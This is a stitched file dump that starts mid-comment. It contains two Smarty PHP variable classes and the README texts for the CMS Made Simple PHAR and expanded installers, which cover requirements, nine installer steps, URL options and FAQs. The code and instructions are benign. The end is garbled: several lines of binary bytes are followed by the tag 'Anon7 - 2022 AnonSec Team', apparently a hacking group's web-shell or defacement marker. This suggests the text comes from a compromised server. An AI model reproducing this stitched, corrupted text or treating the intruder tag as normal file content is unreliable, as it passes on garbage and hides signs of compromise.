 * class for undefined variable object
 * This class defines an object for undefined variable handling
 *
 * @package    Smarty
 * @subpackage Template
 */
class Smarty_Undefined_Variable extends Smarty_Variable
{
    /**
     * Returns null for not existing properties
     *
     * @param string $name
     *
     * @return null
     */
    public function __get($name)
    {
        return null;
    }

    /**
     * Always returns an empty string.
     *
     * @return string
     */
    public function __toString()
    {
        return '';
    }
}
<?php

/**
 * class for the Smarty variable object
 * This class defines the Smarty variable object
 *
 * @package    Smarty
 * @subpackage Template
 */
#[\AllowDynamicProperties]
class Smarty_Variable
{
    /**
     * template variable
     *
     * @var mixed
     */
    public $value = null;

    /**
     * if true any output of this variable will be not cached
     *
     * @var boolean
     */
    public $nocache = false;

    /**
     * create Smarty variable object
     *
     * @param mixed   $value   the value to assign
     * @param boolean $nocache if true any output of this variable will be not cached
     */
    public function __construct($value = null, $nocache = false)
    {
        $this->value = $value;
        $this->nocache = $nocache;
    }

    /**
     * <<magic>> String conversion
     *
     * @return string
     */
    public function __toString()
    {
        return (string)$this->value;
    }
}
--------------------------------------------------
CMS Made Simple PHAR Based Installation Assistant
--------------------------------------------------
This document describes using the CMS Made Simple PHAR Based installation assistant.

The PHAR based installation assistant is a stand-alone PHP application built to provide
the ability to install, upgrade, or freshen CMS Made Simple from within a single
easy-to-use PHP script.

-------------------
NOTE:
-------------------
The PHAR based installation assistant is a binary file and must be transferred in binary mode!

-------------------
Requirements
-------------------
1.  The installation assistant requires a PHP environment with a minimum version of PHP 8.1.
2.  The website's PHP environment must include the PHAR extension.
3.  For new installations of CMS Made Simple you should create a new mysql database and database user.
    - The database user must have ALL PRIVILEGES to all tables within the new database.
    - Your database user account must have a password.
4.  CMS Made Simple itself requires at least PHP 8.1 with numerous libraries enabled
    (the install assistant will check for these) including json, tokenizer, xml, and gd.

-------------------
Instructions
-------------------
1.  Upload the cmsms-<version>-install.php file to your website top directory.
2.  In your web browser, navigate to <your web directory>/cmsms-<version>-install.php
    For example: http://www.mywebsite.site/cmsms-3.44.55-install.php

You should now be presented with a welcome screen.  If, instead, you see a white screen it probably means that your
server is running old, or incompatible, software and that you may be forced to use the traditional installer.  It is a good
hint that if the Phar installer will not run you may have further problems with CMS Made Simple on that server.

The installation assistant can then be used to guide you through the process of installing a new version of CMSMS,
Upgrading an existing installation of CMSMS, or freshening an existing version of CMSMS. There are various options
for each path through the installation assistant and 9 steps

Step 1:
  The first step asks you to select a language and optionally allows you to enable "Advanced Mode". Advanced Mode
  enables several additional options throughout the assistant and increases the verbosity of status output.

Step 2:
  The second step does checks for existing software in your installation directory.  If an existing installation of
  CMS Made Simple is detected you will be presented with options to proceed through the "upgrade" or "freshen" paths
  (depending upon the version detected). If no version of CMS Made Simple is installed you will be guided through the
  "installation" process.

Step 3:
  Step 3 performs various tests on your PHP environment to try to ensure that it is compatible with
  CMS Made Simple. If important tests fail, you will be notified of them and not allowed to continue. However, if
  some non-critical tests fail you will be allowed to continue. We recommend that you adjust your PHP environment
  (you may need to contact your host for assistance) until all tests pass.

Step 4:
  This step is used only during installation and freshen sessions. It asks you to provide basic configuration information
  for the CMS Made Simple environment. This includes database information and credentials, and a server time zone.

  As mentioned in the requirements above, CMSMS requires a mysql database to store data, and user credentials to access
  that mysql database. The user account provided must have ALL PRIVILEGES to the database. You can normally create
  databases, and create user accounts for database from within your web host's control panel.

  Additionally, you are asked to specify the time zone of the server (not your local time zone). You may need to ask your
  host for information about this.

  Upon submit, the installation assistant will validate your database credentials, and check the database to ensure
  you are not accidentally overwriting an existing installation of CMSMS.

Step 5:
  This step is used only during an installation session. It asks you to provide basic credentials of the first admin user
  account. This admin user account allows you to log in to the CMSMS admin console with all privileges and access to all
  of its functionality. From within the CMSMS admin console you can create user groups, and further user accounts
  for additional site managers or editors.

  Unless you have enabled "advanced mode" in step 1, you must also provide an email address. The email address will be
  used to send you your login credentials in the event of a lost or forgotten password.

Step 6:
  This step asks you for a human readable name for your website, and allows you to select additional language packs to install.

  Additional language packs allow users who login to the CMSMS admin console to display the output in their native language.
  Please note: although there are multiple languages available, not all of them are complete.

Step 7:
  This step copies all of the CMSMS core files from within the installation assistant into your CMS Made Simple install.
  It also cleans up those files.

Step 8:
  This step interacts with the database to ensure that all tables and initial content are created properly.

  During the installation process numerous tables and indexes are created in the database, and necessary initial data are installed.
  Additionally (if so selected) sample site-content is installed. That provides useful instruction on how to interact with,
  and build sites with, CMS Made Simple. It is recommended reading.

  During an upgrade session, any necessary database changes are performed to ensure that the database tables, and their contents,
  are compatible with the new version of CMSMS.

Step 9:
  This step finishes the installation and performs a clean-up.

  During the installation process all core modules and selected non-core modules (if any) are installed, necessary temporary directories created, and the configuration file
  is written.

  During the upgrade process core modules and selected non-core modules (if any) are upgraded if necessary, and a new version of the configuration file is written.
  Any existing configuration file is backed up for safety.  Additionally, the CMSMS cache is cleared.

  After everything is complete you will be presented with links to either visit the CMSMS website, or to log in to its admin console.

-----------
Afterwards
-----------

After confirming that the site is working as expected, confirm that the installer .php file and related folder (with all its contents)
have been deleted from the server. If not so, delete them manually, using the site's file manager (in cPanel or the like).
Likewise for any intaller.ini file, in the site-root folder, that was used to facilitate the installer session.

---------------------
Additional Features
---------------------
The single installation assistant package provides these features:
1.  Installing a new version of CMSMS into an empty directory.
2.  Upgrading an existing version of CMSMS to a new version
3.  Freshening (or repairing) an existing installation of CMSMS
    This option may be useful for fixing a corrupted installation of CMSMS.  Only available when the current version of CMSMS and the new version are identical, it will replace all of the core files with those distributed by the system and re-generate a new config.php file.
4.  Installing additional language packages
    As part of the "Freshen" functionality, when repairing an installation you have the option to install additional language packs.
5.  Advanced vs. Simple mode

---------------------------
Parameter Details
---------------------------

1.  tmpdir=/absolute/path
    Specify the absolute path to the directory to be used for temporary files.  This directory must be writable by the PHP process.  This option should not be needed on most hosts.
2.  debug=true
    Attempt turn on error reporting, and to display some meaningful help information.
3.  nobase=true
    Do not output a base href tag in the generated HTML.
4.  dest=/absolute/path
    Allow specifying a custom destination directory (must be an absolute path).
5.  nofiles=true
    Do not overwrite files.  This is useful when needing to setup the database when the files have been manually extracted from the source code repository.
6.  clear=true
    Usable only on the first step, this will ensure that all preset config information is cleared from the session (for development purposes only).

---------------------------
Frequently Asked Questions
---------------------------
Q: What is a PHAR?
A: A Phar is a single, self contained, executable PHP Archive.  It allows us to distribute the CMSMS installation assistant as a single file even though it contains numerous libraries, classes, stylesheets, and scripts. This allows CMSMS users to install, upgrade or freshen their CMSMS systems by  uploading a single file to their web server.

Q: Why is there a .php file inside the archive, and not a .phar?
A: Most web servers are not configured to treat files ending with .phar as executable PHP scripts.  Therefore we have renamed the file as a .php file so that web servers will know to execute the script.  Please note however, that this is a binary file and must be treated as such.

Q:  How do I upload this thing via FTP?
A:  We do not recommend FTP as a file transfer mechanism.  In fact, we highly discourage it.

    If your only mechanism to transfer files is via FTP because your host does not support shell/sftp or does not provide a reasonable web control panel with upload and unzip capabilities, then that could indicate that the host is not running up-to-date software, and you may have further difficulties.  Consider evaluating and moving to a different host.

    If you still insist on using FTP then use a decent FTP client (such as filezilla) and ensure that you transfer ALL files in binary mode.

Q: I get a message saying: "unable to create temporary file for decompression of gzipped phar archive"
A: Some hosts have restricted PHP's write access to the system temporary directory, which the installer needs to expand archives.  However there is a mechanism to use a different temporary directory for the installer.
   You can add a TMPDIR=/absolute/path/to/writable/directory argument to the URL on the first page.  If this directory is writable it will be used for storing temporary files throughout the execution of the installation assistant.

Q: The installation assistant says it cannot write to all files in the directory.  Why?
A: The installation assistant is capable of upgrading from different different versions of CMSMS, and to do that it must be able to create, update, and delete files.  Including the config.php file.  In order to do that the PHP processor it must be able to write to each and every file and directory in the installation directory.

   Additionally, the installation assistant will change the permissions on the config.php file so that by default it is protected.  When performing an installation, or an upgrade you may need to manually change these permissions so that the installation assistant can adjust your config.php file.

Q: I Get a white screen, what can I do?
A: A white screen indicates an error of some sort.  It can be caused by permissions problems, an incompatible host, or something else.  There are a few things to try:
   1.  Try to browse to the README-PHAR.TXT file with your browser.  If that also generates a white screen then it is indicative of permissions or .htaccess limitations.
       Note:  Depending upon host configuration, Some hosts do not allow browseable files to be writable, or even readable by users other than the file owner.  You can try changing the permissions of the extracted files to 600.
   2.  Rename your .htaccess file(s) out of the way.  (Rewrite rules and bad configuration options in the .htaccess file can cause 500 errors).
   3.  Enable and find your php error logs so that you can find an actual error message to aide in further diagnosis.
   4.  Add ?debug=1 to the URL for the installer.  This will attempt to enable a simple debug mode.  This, depending on your host configuration may allow you to see error messages.

Q:  I still get a white screen, and I've enabled debug mode... now what?
A:  This could indicate that either your installer upload is corrupted OR that your host does not allow you to change debug settings in the standard way.   You will probably have to contact your host in order to get at the actual error.

Q:  I Get a redirection loop, what can I do?
A:  Some hosting environments (nginx, and litespeed) particularly can cause redirection loops when executing even the simplest of phar archives.  This is due to one or more bugs in php.  Specifically: https://bugs.php.net/bug.php?id=71465 and https://bugs.php.net/bug.php?id=67587 (though more may exist).  For these environments we recommend that you use the expanded installer.  Be sure you read it's README file in it's entirety.
---------------------------------------
CMS Made Simple Expanded Installation Assistant
---------------------------------------
This document describes using the expanded CMS Made Simple installation assistant.

As opposed to the PHAR based installation assistant, this version is not compressed into a single archive file
and contains numerous files and directories.  It is useful for installing, upgrading and freshening CMSMS installs
on servers which are not necessarily running up-to-date software or those with special configurations that do not support
using the simpler phar installer.


-------------------
WARNINGS:
-------------------
1.  We DO NOT recommend the use of this version of the installation assistant.  Please use the PHAR version of the installer
    whenever possible.   When using this installer, please execute extreme caution.

2.  DO NOT INSTALL THIS PACKAGE IN A POPULATED DIRECTORY.
    At all times you MUST use a clean directory for the expanded version of the installation assistant.  This clean directory
    can be located below an existing CMSMS install,  or parallel to it.


-------------------
Requirements:
-------------------
1.  The installation assistant requires a PHP environment with a minimum version of PHP 5.4.0.
2.  For new installations of CMS Made Simple you should create a new mysql database and database user.
    - The database user must have ALL PRIVILEGES to all tables within the new database.
    - Your database user account must have a password.
3.  CMS Made Simple itself requires at least PHP 5.6 with numerous libraries enabled (the install assistant will
    check for these) including json, tokenizer, xml, and gd.
4.  Your PHP environment must include the PHAR extension (yes, even for the expanded installer).  This is for expanding the archive(s) included within the installation assistant.


-------------------
Instructions:
-------------------
1.  Using your web host's file manager (usually accessible within the control panel), create a new directory below
    the location where you want to install CMSMS.  Typically, you could name this directory cmsms_install
    For example:  /home/<myusername>/public_html/cmsms_install

2.  Upload the cmsms-<version>-install.expanded.zip file to this subdirectory.

3.  Extract the files from the .zip archive into this subdirectory.
    This will create numerous files and directories.  So use caution that you are extracting the files into the proper directory.

3.  Using your browser, navigate to the directory created in step 1.
    For Example:   http://www.mywebsite.site/cmsms_install

You should now be presented with a welcome screen.  If instead you see a white screen it probably means that your
server is running outdated software versions (e.g. PHP, plugins such as ion-cube or zend-guard). It is a good hint that
if the installer will not run you may have further problems with CMS Made Simple on that server.

The installation assistant can then be used to guide you through the process of installing a new version of CMSMS,
Upgrading an existing installation of CMSMS, or freshening an existing version of CMSMS.   There are various options
for each path through the installation assistant and 9 steps

Step 1:
  The first step asks you to select an installation directory (the default value is your current directory's parent),
  to select a language for use in the remainder of the installer,  and optionally allows you to enable "Advanced Mode".

  -------
  WARNING Use extreme caution and ensure that the destination directory you select is correct.
  -------

  Advanced mode enables various additional options throughout the assistant and increases the verbosity of the status output.

Step 2:
  The second step does checks for existing software in your installation directory.  If an existing installation of
  CMS Made Simple is detected you will be presented with options to proceed through the "upgrade" or "freshen" paths
  (depending upon the version detected).  If no version of CMS Made Simple is installed you will be guided through the
  "installation" process.

Step 3:
  Step 3 performs various tests on your PHP environment to try to ensure that it is compatible with
  CMS Made Simple.   If important tests fail, you will be notified of them and not allowed to continue.  However, if
  some non-critical tests fail you will be allowed to continue.   We recommend that you adjust your PHP environment
  (you may need to contact your host for assistance) until all tests pass.

Step 4:
  This step is used only during the installation, and freshen paths.  It asks you to provide basic configuration information
  for the CMS Made Simple environment.  This includes database information and credentials, and a server time zone.

  As mentioned in the requirements above,  CMSMS requires a mysql database to store data, and user credentials to access
  that mysql database.  The user account provided must have ALL PRIVILEGES to the database.  You can normally create
  databases, and create user accounts for database from within your web host's control panel.

  Additionally, you are asked to specify the time zone of the server (not your local time zone).  You may need to ask your
  host for information about this.

  Upon submit, the installation assistant will validate your database credentials, and check the database to ensure
  you are not accidentally overwriting an existing installation of CMSMS.

Step 5:
  This step is used only during the installation path.  It asks you to provide basic credentials to the first Admin user
  account.  This Admin user account allows you to login to the CMSMS Admin console with all privileges and access to all
  of its functionality.   From within the CMSMS Admin console you can create user groups, and further user accounts
  for additional site managers or editors.

  Unless you have enabled "Advanced mode" in step 1, you must also provide an email address.  The email address will be
  used to send you your login credentials in the event of a lost or forgotten password.  An email will also be sent to you
  with your initial login credentials.

Step 6:
  This step asks you for a human readable name for your website, and allows you to select additional language packs to install.

  Additional language packs allow users who login to the CMSMS Admin console to display the output in their native language.
  Please note: though there are multiple languages available, not all of them are complete.

Step 7:
  This step copies all of the CMSMS Core files from within the installation assistant into your CMS Made Simple install. it also
  cleans up those files.

Step 8:
  This step interacts with the database to ensure that all tables and initial content are created properly.

  During the installation process numerous tables and indexes are created in the database, and necessary initial data is installed.
  Additionally (by default) sample data is installed.  The sample data provides useful instructions on how to interact with,
  and build sites with, CMS Made Simple. This is recommended reading.

  During the upgrade process, any necessary database changes are preformed to ensure that the database tables, and thier contents,
  are compatible with the new version of CMSMS.

Step 9:
  This step finishes the installation and performs a clean up.

  During the installation process all core modules are installed, necessary temporary directories created, and the configuration file
  is written.

  During the upgrade process core modules are upgraded if necessary, and a new version of the configuration file is written.
  Any existing configuration file is backed up for safety.  Additionally, the CMSMS cache is cleared.

  Once everything is complete you will be presented with links to either visit your CMSMS website, or to login to its Admin console.

-----------
Afterwards
-----------
After successful completion of the installation assistant, you should, using either the command line or your web hosts file manager,
It is important for security purposes that you delete the installation assistant .php file and this text file from your server after verifying that the operation has succeeded.

---------------------------
Additional Features
---------------------------
The single installation assistant package provides these features:
1.  Installing a new version of CMSMS into an empty directory.
2.  Upgrading an existing version of CMSMS to a new version
3.  Freshening (or Repairing) an existing installation of CMSMS
    This option may be useful for fixing a corrupted installation of CMSMS.  Only available when the current version of CMSMS and the new version are identical, it will replace all of the core files with those distributed by the system and re-generate a new config.php file.
4.  Installing additional language packages
    As part of the "Freshen" functionality, when repairing an installation you have the option to install additional language packs.
5.  Advanced vs. Simple mode

---------------------------
Available Options
---------------------------
The installation assistant supports the following URL based options
1.  TMPDIR=/absolute/path
    Specify the absolute path to the directory to be used for temporary files.  This directory must be writable by the PHP process.  This option should not be needed on most hosts.
2.  debug=1
    Attempt Turn on error reporting, and to display some meaningful help information.
3.  nobase=1
    Do not output a base href tag in the generated HTML.
4.  dest=/absolute/path
    Allow specifying a custom destination directory (must be an absolute path).
5.  nofiles=1
    Do not overwrite files.  This is useful when needing to setup the database when the files have been manually extracted from the source code repository.
6.  clear=1
    Usable only on the first step, this will ensure that all preset config information is cleared from the session (for development purposes only).

----
FAQ:
----
Q: The installation assistant says it cannot write to all files in the directory.  Why?
A: The installation assistant is capable of upgrading from different different versions of CMSMS, and to do that it must be able to create, update, and delete files.  Including the config.php file.  In order to do that the PHP processor it must be able to write to each and every file and directory in the installation directory.

   Additionally, the installation assistant will change the permissions on the config.php file so that by default it is protected.  When performing an installation, or an upgrade you may need to manually change these permissions so that the installation assistant can adjust your config.php file.

Q: I get a message saying: "unable to create temporary file for decompression of gzipped phar archive"
A: Some hosts have restricted PHP's write access to the system temporary directory, which the installer needs to expand archives.  However there is a mechanism to use a different temporary directory for the installer.
   You can add a TMPDIR=/absolute/path/to/writable/directory argument to the URL on the first page.  If this directory is writable it will be used for storing temporary files throughout the execution of the installation assistant.

Q: I Get a white screen, what can I do?
A: A white screen indicates an error of some sort.  It can be caused by permissions problems, an incompatible host, or something else.  There are a few things to try:
   1.  Try to browse to the README-PHAR.TXT file with your browser.  If that also generates a white screen then it is indicative of permissions or .htaccess limitations.
       Note:  Depending upon host configuration, Some hosts do not allow browseable files to be writable, or even readable by users other than the file owner.  You can try changing the permissions of the extracted files to 600.
   2.  Rename your .htaccess file(s) out of the way.  (Rewrite rules and bad configuration options in the .htaccess file can cause 500 errors).
   3.  Enable and find your php error logs so that you can find an actual error message to aide in further diagnosis.
   4.  Add ?debug=1 to the URL for the installer.  This will attempt to enable a simple debug mode.  This, depending on your host configuration may allow you to see error messages.

Q:  I still get a white screen, and I've enabled debug mode... now what?
A:  This could indicate that either your installer upload is corrupted OR that your host does not allow you to change debug settings in the standard way.   You will probably have to contact your host in order to get at the actual error.

Q:  How do I upload this thing via FTP?
A:  We do not recommend FTP as a file transfer mechanism.  In fact, we highly discourage it.

    If your only mechanism to transfer files is via FTP because your host does not support shell/sftp or does not provide a reasonable web control panel with upload and unzip capabilities, then that could indicate that the host is not running up-to-date software, and you may have further difficulties.  Consider evaluating and moving to a different host.

    If you still insist on using FTP then use a decent FTP client (such as filezilla) and ensure that you transfer ALL files in binary mode.
MXL6n��R�_8
5��̅'UGBMB

Anon7 - 2022
AnonSec Team